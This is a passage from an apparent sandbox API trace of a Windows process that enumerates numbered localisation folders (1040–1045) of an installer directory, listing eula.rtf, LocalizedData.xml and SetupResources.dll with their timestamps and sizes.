ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.124] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x109e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.124] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x151aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.125] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.125] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.125] FindClose (in: hFindFile=0x802658 | out: hFindFile=0x802658) returned 1 [0169.125] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.125] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1040", cAlternateFileName="")) returned 1 [0169.125] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.125] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802498 [0169.126] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.126] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.126] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x138bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.126] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.127] FindNextFileW (in: hFindFile=0x802498, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.127] FindClose (in: hFindFile=0x802498 | out: hFindFile=0x802498) returned 1 [0169.127] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.127] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1041", cAlternateFileName="")) returned 1 [0169.127] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.127] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802058 [0169.128] FindNextFileW (in: hFindFile=0x802058, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.128] FindNextFileW (in: hFindFile=0x802058, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x278d, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.128] FindNextFileW (in: hFindFile=0x802058, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x10a82, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.128] FindNextFileW (in: hFindFile=0x802058, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.129] FindNextFileW (in: hFindFile=0x802058, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.129] FindClose (in: hFindFile=0x802058 | out: hFindFile=0x802058) returned 1 [0169.129] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.129] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1042", cAlternateFileName="")) returned 1 [0169.129] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.129] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802518 [0169.129] FindNextFileW (in: hFindFile=0x802518, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.129] FindNextFileW (in: hFindFile=0x802518, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x318f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.129] FindNextFileW (in: hFindFile=0x802518, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xfed6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.130] FindNextFileW (in: hFindFile=0x802518, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.130] FindNextFileW (in: hFindFile=0x802518, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.130] FindClose (in: hFindFile=0x802518 | out: hFindFile=0x802518) returned 1 [0169.130] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.130] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1043", cAlternateFileName="")) returned 1 [0169.130] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.130] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802658 [0169.130] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.130] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdda, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.131] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13712, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.131] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.131] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.131] FindClose (in: hFindFile=0x802658 | out: hFindFile=0x802658) returned 1 [0169.131] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.131] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1044", cAlternateFileName="")) returned 1 [0169.131] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.131] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802558 [0169.132] FindNextFileW (in: hFindFile=0x802558, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.132] FindNextFileW (in: hFindFile=0x802558, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.133] FindNextFileW (in: hFindFile=0x802558, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x135c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.133] FindNextFileW (in: hFindFile=0x802558, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.133] FindNextFileW (in: hFindFile=0x802558, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.133] FindClose (in: hFindFile=0x802558 | out: hFindFile=0x802558) returned 1 [0169.133] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.133] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1045", cAlternateFileName="")) returned 1 [0169.133] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.133] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802598 [0169.134] FindNextFileW (in: hFindFile=0x802598, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.134] FindNextFileW (in: hFindFile=0x802598, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfc8, dwReserved0=0x0, 